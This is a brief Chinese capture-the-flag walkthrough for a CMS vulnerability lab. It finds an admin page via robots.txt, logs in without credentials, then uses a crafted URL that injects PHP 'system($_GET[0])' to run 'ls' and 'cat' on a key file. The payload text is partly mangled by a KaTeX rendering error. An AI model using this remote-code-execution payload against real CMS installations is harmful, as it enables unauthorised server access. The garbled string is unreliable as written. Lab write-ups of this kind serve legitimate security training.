CMS系统漏洞分析溯源(第2题)
难易程度:★★★
题目类型:CMS漏洞
使用工具:FireFox浏览器
1.打开靶场,首先看看可不可以访问/robots.txt。
发现了后台登录地址/admin.php。
2.访问登录地址,用户名和密码都不用自己输入,直接进入!
3.进入后,构造url:
index.php?0=ls&m=content&c=content&a=public_categorys&type=add&menuid=822;KaTeX parse error: Expected '}', got 'EOF' at end of input: {system(_GET[0])}&pc_hash=vad6K3&from=block
执行命令ls,查看文件。
在url中输入就能直接快速找到key的文件。
4.把url中的命令ls修改为cat key_278402180914531.php。然后按F12查看源码,就能找到key了。